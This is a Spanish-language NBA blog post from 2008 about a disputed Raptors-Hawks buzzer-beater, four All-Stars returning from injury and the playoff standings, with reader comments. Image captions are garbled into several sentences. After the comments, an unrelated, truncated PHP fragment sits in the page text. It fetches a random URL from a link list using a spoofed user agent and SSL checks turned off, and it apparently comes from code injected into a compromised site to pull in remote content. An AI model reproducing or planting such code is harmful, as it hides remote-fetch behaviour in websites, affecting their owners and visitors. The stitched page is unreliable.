4 regresos y una polémica

03 de April de 2008 por MagicJohnson32

mitchellyellsLakers, Clippers y, sobre todo, Mavericks están de enhorabuena. Los Wizards también, pero menos. Los Raptors, en cambio, dejaron Atlanta con un enfado monumental. Y no es para menos, ya que les fue anulada la canasta ganadora de TJ Ford después de que los árbitros revisaran el vídeo. La cosa sucedió así: un triple de Bibby empató el partido a 0.5 segundos para el final. Tras un tiempo muerto, los Raptors ejecutaron una magnífica jugada en la que Delfino envió el balón bombeado a Ford para que dejase la bandeja en alley-oop. El equipo canadiense ya celebraba lo que parecía una victoria sin posibilidad a la discusión cuando los árbitros vieron en el vídeo que Ford soltaba el balón justo después del final del tiempo reglamentario.

El problema y motivo de que los canadienses se estén planteando formalizar una protesta: el reloj se puso en marcha antes de que el balón alcanzase a las manos de Ford, por lo que la canasta habría llegado antes de la bocina de no haber sido por dicho error. Por supuesto, los Hawks ganaron el partido tras una prórroga, 120-127, y se asientan de forma casi definitiva en la octava plaza del Este.

 

Peor en realidad no venía a hablar de polémicas sino de buenas noticias: dirkharringtonAnoche se dio la casualidad de quepaufrye cuatro All-Stars regresaron tras superar sus respectivas lesiones. Especialmente llamativas y esperadas resultaron las vueltas de Gilbert Arenas, que no jugaba desde el 16 de noviembre, y de Elton Brand, quien debutó esta temporada tras romperse el tendón de Aquiles el pasado verano y logró 19 puntos en 26 minutos ante los Sonics. También volvieron Pau Gasol, que aportó 10 puntos y 7 asistencias después de perderse 9 partidos por una lesión en el tobillo, y, por desgracia para los Warriors, Dirk Nowitzki.

El alemán sólo ha sido baja cuatro partidos pero su equipo se está jugandoeltonbrandebutarenasbucks entrar en los Playoffs y su regreso ofrece a los Mavs un impulso que ya se notó anoche en la victoria sobre Golden State por 86-111. De hecho, el único de los regresados que perdió fue Arenas, en una de las sorpresas de la noche, la victoria de los Bucks en Washington, 110-109, con buzzer beater del rookie Ramon Sessions. Por si fuera poco, Jamison y Stevenson acabaron el partido lesionados. He aquí el vídeo de la canasta:

(Igual es cosa mía, pero diría que el reloj tarda mucho en arrancar cuando los Bucks inician la jugada y que 1.1 segundos no dan para tanto.)

Hay otra noticia destacada, y es la confirmación de que Donnie Walsh se convierte en presidente de los Knicks. Pero los detalles sobre esto y las consecuencias que pueda tener en el futuro de los del Madison os los ofreceremos más tarde. Ahora os dejamos con la situación, a día de hoy, de las posiciones de Playoffs de ambas conferencias y los emparejamientos que resultarían:

Conferencia Este:

1. Celtics (60-15) vs 8. Hawks (35-40)

4. Cavaliers (42-33) vs 5. Raptors (38-37)

3. Magic (47-28) vs 6. 76ers (38-37)

2. Pistons (53-21) vs Wizards (38-37)

Conferencia Oeste:

1. Hornets (52-22) vs 8. Nuggets (46-29)

4. Jazz (50-26) vs 5. Suns (50-25)

3. Lakers (51-24) vs 6. Rockets (49-25)

2. Spurs (52-23) vs 7. Mavericks (47-28)

La imagen del día:

rileyhides

Pat Riley, deleitándose con el juego de los suyos. Showtime’s back!

Por cierto, si alguien sabe decirnos algo sobre cualquiera de los jugadores que fueron suplentes anoche por los Heat, se lleva una camiseta firmada por ellos. Y no vale mirar en Google.

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Juas… si no fuera por el antiguo cariño que le tengo al pobre me estaría descojonando… qué mentira!!! si me estoy descojonando!!! (qué buena la foto)
    Lo más importante (para mí) la vuelta de Pau (y a cruzar los dedos de que podamos contar con el equipo completo en playoffs) y el posible cruce contra Houston que me parecería muy bueno tal y como están funcionando las cosas.
    Por otro lado, a pesar de que es tirar piedras contra mi tejado, me alegra la vuelta de Nowitzki… aunque no a costa de la palmatoria de GW. A pesar de que en mi opinión el más flojito de los 3 es Denver creo que los que menos se merecen pasar son ellos y los que más los Warriors. Me jodería que las cosas terminaran así.
    Sobre las dos jugadas de último segundo la verdad es que resulta curioso que dos jugadas tan concretas, tan antagónicas y tan injustas tengan lugar precísamente el mismo día para compararlas. Desde luego… si utilizan medios tecnológicos para tomar decisiones tiene cojones que lo hagan tan con el ojete. Se han cubierto de gloria, vaya.
    Sobre los suplentes de los Heat… lo confieso. Ni puñetera idea de quienes son (aunque el nombre del Lasme ese me parece gracioso…)

      Citar

  2. xapa_croack dice:
    #2

    Yo conozco al Lasme ese, que este año ha estado en la liga de desarrollo.

    La vuelta de Brand, pues tampoco es tan positiva, supongo que intentara forzar para ver si tiene alguna opcion de ir a Pekin, que no interesa que vaya, mejor que se recupere del todo bien, y a ver los JJOO por la Tv.

      Citar

  3. txusma dice:
    #3

    Pues parece q error en ambos casos. Es cierto q el reloj en el caso de los Bucks empieza a correr como minimo 4 o 5 decimas despues q llegue a ¿Bogut? Y en el de los Raptors está probadisimo q el reloj ya habia empezado a contar antes de llegar a Ford.
    En estos casos, en el q el error esta en la mesa no se pueden repetir esos ultimos segundos?

      Citar

  4. Dantley dice:
    #4

    Hey, preguntad sobre Lasme, jeje. Es lo que tiene jugar una liga virtual con 3 rondas de draft ¡¡¡ El tipo es una bestia defensiva (aunque demasiado bajito) pero vamos, que dudo mucho que el año que viene siga en la NBA. Lo intentará de nuevo en la NBDL pero no creo que sirva de mucho. Y para Europa aporta muy poco en ataque con lo cual creo que se tendrá que ganar la vida en la CBA

    La verdad es que fue un día grande ayer. 4 cracks vuelven, dos buzzer beaters tremendos. En fin, que pura NBA

      Citar

  5. MagicJohnson32 dice:
    #5

    Hombre, Xapa, creo que todos ellos vienen de la liga de desarrollo, así que eso no vale. Creo que ese Johnson fue el que estuvo en los Grizzlies el año pasado, pero no me jugaría los ahorros, jeje.

    A mí no me parece mal que vuelva Brand. Que aproveche estos partidos porque si no, estaría más de un año sin jugar un partido serio, y eso es demasiado.

    Sobre lo que comenta Deerhunter… estaría bien Lakers-Rockets, aunque prefiero a Denver (eeeevidentemente). Lo ideal sería ir por el lado del cuadro contrario a Spurs y Hornets, y tener de cruces a Suns y Jazz, pero para eso hay que ganar todo lo que nos queda.

      Citar

  6. TheDeerHunter dice:
    #6

    Yo es que no sé qué decirte… lo principal es la primera ronda pero después si me das a elegir entre Spurs, Hornets, Suns o Jazz lo tendría difícil para decidirme.
    Me diréis que estoy loco, pero casi me quedaba en la parte del cuadro de Hornets si dependiera de mí… por aquello de la experiencia en playoffs y ese tipo de cosas.
    Lo que sí que tengo claro es que a los Spurs ni en pintura hasta la hipotética final de conferencia… y si pudiera ser que alguien los elimine antes mejor que mejor.
    Van a llover palos…

      Citar

  7. MagicJohnson32 dice:
    #7

    Es que yo estaba pensando en quedar primeros, con Spurs y Hornets en 2ª y 3ª posición, y Jazz cuartos.

    A mí los Suns ya me van bien. Además, Phoenix va a tener una primera ronda durísima si no nos remonta y acaba primero de la Pacific. Esperemos que no ocurra y ahora que ha vuelto Pau, y que Bynum está al caer, no debería ocurrir porque nuestro calendario es mejor que el suyo.

    Y los Spurs… no sé. Creo que podemos con ellos. Y sobre todo, no tienen a Chris Paul. ¡¡¡Mieeeedo, tengo mieeeeeedo!!! No, en serio, para las finales de conferencia me da igual. Es el Oeste, quienes lleguen hasta allí serán grandes equipos sí o sí.

      Citar

  8. TheDeerHunter dice:
    #8

    En ese caso que comentas estoy completamente de acuerdo contigo. El problema es que ahora lo veo dificilillo tras las “hazañas” de la semana pasada (que para colmo soy tan mongolo de “disfrutar” en directo las dos :S)
    Yo diría que ya en segunda ronda se presentan finales anticipadas en todos los casos… así que, como dices, una vez pillado el primer puesto daría igual.
    En principio, con el equipo al completo, diría que podemos contra cualquiera… pero también ellos podrían pensar lo mismo contra el resto de los equipos. ¿Primeros favoritos del oeste con el equipo al completo?? podría ser pero quien indiscutiblemente lo son es SA…
    ¿Podría considerarse una sorpresa que Utah, Suns, Hornets o si me apuras Dallas llegaran a la final de la NBA?? Pues… hasta cierto punto.

    PD: ¿se sabe algo de Ariza??

      Citar

  9. Viva_Dirk dice:
    #9

    Yo no subestimaría a casi nadie, creo que mas o menos asequibles son Denver y Rockets, el resto hay que jugar al máximo.

    Nadie habla de Utah, pero para mi que son de los equipos que mejor se conocen y a la vez mejor baloncesto hacen, tienen muchísimas variantes y Deron Williams para ejecutarlas, es el rival que me parece mas dificil para los Lakers.

      Citar

  10. MagicJohnson32 dice:
    #10

    Juas juas, yo también vi los dos contra Blazers y Bobcats. Qué ganas de patear el ordenador me dan a veces estos tíos…

    Puestos a elegir, yo quiero ganar el anillo cargándome a Suns, Jazz, Spurs y Celtics. ¡¡Sería un sueño hecho realidad!!

    De Ariza se sabe que está complicado que vuelva a jugar esta temporada. En teoría debería de llegar a tiempo y regresar durante los PO’s pero la lesión es en el pie, y ése es su punto débil. Está evolucionando muy lentamente y yo empiezo a no contar con él para este año. Es una pena porque empezaba a ser importante cuando se rompió. Nos vendría muy bien esa energía, no tenemos a nadie como él.

      Citar

  11. MagicJohnson32 dice:
    #11

    A mí me encantan los Jazz pero los veo buen rival para Lakers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>